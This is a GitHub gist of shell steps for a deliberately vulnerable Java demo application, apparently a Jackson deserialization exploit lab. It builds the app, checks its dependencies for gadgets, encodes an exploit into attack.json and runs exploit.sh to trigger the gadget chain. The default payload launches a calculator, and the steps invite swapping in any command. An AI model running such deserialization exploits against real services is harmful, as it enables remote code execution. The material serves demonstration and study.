Created
April 19, 2024 18:52
-
-
Save conikeec/236f3091a02b02a64c78e736fe612520 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Build the project | |
| # spin up a shell prompt | |
| git clone https://github.com/conikeec/jackspoilt.git | |
| cd jackspoilt | |
| # compile and package | |
| mvn clean package | |
| # verify if gadgets are avaliable to exploit (refer blog) | |
| mvn dependency:tree | |
| # Start application server | |
| java -jar target/jackspoilt-1.0-SNAPSHOT.jar | |
| ## Spin up another terminal | |
| cd jackspoilt | |
| # create the exploit by editing ./master/exploit/Exploit.java | |
| # current version adds errros to log and spawns a calculator on OSX | |
| # (For Linux based OS please revise the line to specify an exploit of your choice) | |
| # Modify here https://github.com/conikeec/jackspoilt/blob/master/exploit/Exploit.java#L13 | |
| # compile ./master/exploit/Exploit.java | |
| rm attackscripts/attack.json | |
| mvn exec:java -D"exec.mainClass"="EncodeExploit" | |
| # The command above creates attack.json in the attackscripts directory | |
| more attackscripts/attack.json | |
| ## Run the exploit | |
| # Ensure that the service is running on the other terminal | |
| # exercise the web routes | |
| ./add.sh | |
| ./list.sh | |
| # This command will inject a malicious payload, trigger gadget chain | |
| # (Edit exploit/Exploit.java to add your exploit command of choice) | |
| ./exploit.sh | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment